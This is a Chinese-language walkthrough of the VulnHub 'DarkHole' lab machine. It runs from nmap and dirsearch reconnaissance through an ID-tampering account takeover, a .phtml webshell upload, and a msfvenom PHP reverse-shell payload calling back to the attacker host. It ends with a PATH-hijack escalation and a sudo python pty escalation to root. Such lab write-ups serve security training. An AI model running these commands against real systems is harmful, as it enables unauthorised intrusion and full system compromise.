一、靶场介绍
1.下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip
2.将靶机网络适配器改为NAT模式
3.启动靶机
二、信息收集
1、主机发现
nmap -sn 192.168.111.1/24
2.端口扫描
nmap -A 192.168.111.134 -p 1-65535
3.目录扫描
dirsearch -u 192.168.111.134 -e *
4.网页访问
三、渗透流程
1.网页显示有login,尝试注册账号登录:zjx/zjx@qq.com/123456
登录成功:
2.使用BP抓包,当前id=2,猜测id=1为管理员账户,修改id=1
3.尝试使用管理员:admin加刚刚修改的密码:111进行登录
4.新页面有文件上传点,尝试上传一句话木马,发现限制了上传格式
5.尝试上传特殊后缀文件:.phtml
6.浏览器访问1.phtml
回显空白,成功上传:
7.使用蚁剑连接
8.kali生成shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.128 lport=4444 -o msfshell.php
9.把2.php放入靶机中
10.kali开启msf监听,浏览器访问木马文件
11.进入shell,生成交互shell
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
12.查看敏感文件,发现有两个用户
13.在用户目录下发现可执行文件toto
14.利用环境变量切换得到用户shell
echo "/bin/bash" > /tmp/id
export PATH=/tmp:$PATH
./toto
15.查看当前用户家目录,并且找到了密码:root123
16.登录到john用户,查看用户权限
17.根据提示,在file.py里写入shell代码并运行,提权成功
echo "import pty;pty.spawn('/bin/bash')" > file.py
sudo python3 /home/john/file.py